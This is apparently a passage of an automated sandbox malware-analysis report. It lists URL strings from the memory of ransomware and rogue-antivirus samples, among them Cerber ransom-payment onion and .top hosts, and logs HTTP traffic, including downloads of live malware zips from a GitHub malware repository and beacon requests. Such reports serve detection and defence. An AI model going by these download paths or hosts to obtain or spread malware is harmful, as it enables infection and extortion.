          Source: Endermanch@AntivirusPro2017.exe, 00000006.00000003.696813300.0000000002923000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://securerem.com/buynow.php?bid=%advid%
          Source: Endermanch@AntivirusPro2017.exe, 00000006.00000003.697252275.0000000002931000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://securerem.com/support.html
          Source: Endermanch@AntivirusPro2017.exe, 00000006.00000003.697252275.0000000002931000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://securerem.com/support.htmla
          Source: rundll32.exe, 0000000F.00000002.554445419.000000000343C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.511029436.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.488118992.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.471920042.000000000343D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: rundll32.exe, 0000000F.00000002.554445419.000000000343C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.511029436.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.488118992.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.471920042.000000000343D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: rundll32.exe, 0000000F.00000002.554445419.000000000343C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.511029436.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.488118992.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.471920042.000000000343D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: Endermanch@AntivirusPro2017.exe, 00000006.00000003.696813300.0000000002923000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://twinkcam.net/images/v.php?id=%advid%
          Source: Endermanch@DeriaLock.exe, 00000016.00000000.477860410.0000000000D12000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://wallup.net
          Source: Endermanch@DeriaLock.exe, 00000016.00000000.477860410.0000000000D12000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://wallup.nethttp://wallup.nethttp://wallup.net
          Source: avpc2009.exe, 00000019.00000000.490943121.0000000000516000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: http://www.clamav.net
          Source: avpc2009.exe, 00000019.00000000.490943121.0000000000516000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: http://www.clamav.net/bugs
          Source: avpc2009.exe, 00000019.00000000.490943121.0000000000516000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: http://www.clamav.net/support/faq
          Source: Endermanch@AnViPC2009.exe, 00000008.00000003.468576995.0000000004524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gnu.org/software/libtool/libtool.htmlDVarFileInfo$
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.17gcun.top/E4EE-0CB2-5F62-0098-B68C
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.18ey8e.top/E4EE-0CB2-5F62-0098-B68C
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.19kdeh.top/E4EE-0CB2-5F62-0098-B68C
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.1mpsnr.top/E4EE-0CB2-5F62-0098-B68C
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.1n5mod.top/E4EE-0CB2-5F62-0098-B68C
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8
          Source: Endermanch@Cerber5.exe, 00000010.00000003.528821049.000000000547A000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000010.00000002.600328672.0000000005468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/downlo&#097;d/download-easy.html.en
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/download/download-easy.html.en
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/results?search_query=Install
          Source: unknownDNS traffic detected: queries for: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/NavaShield.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Central.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SE2011.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SecurityScanner.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SmartDefragmenter.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SmartDefragmenter.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/VAV2008.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ruCookie: _yasc=jhOo48wDWFez3aA4ke/HoawdFErttzj/bx63BS9upmbL+J0m; is_gdpr_b=CPe0cBDfjAEYAQ==; is_gdpr=1
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /scripts/new_install.php?owner=6AdwCleaner HTTP/1.1Host: www.vikingwebscanner.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
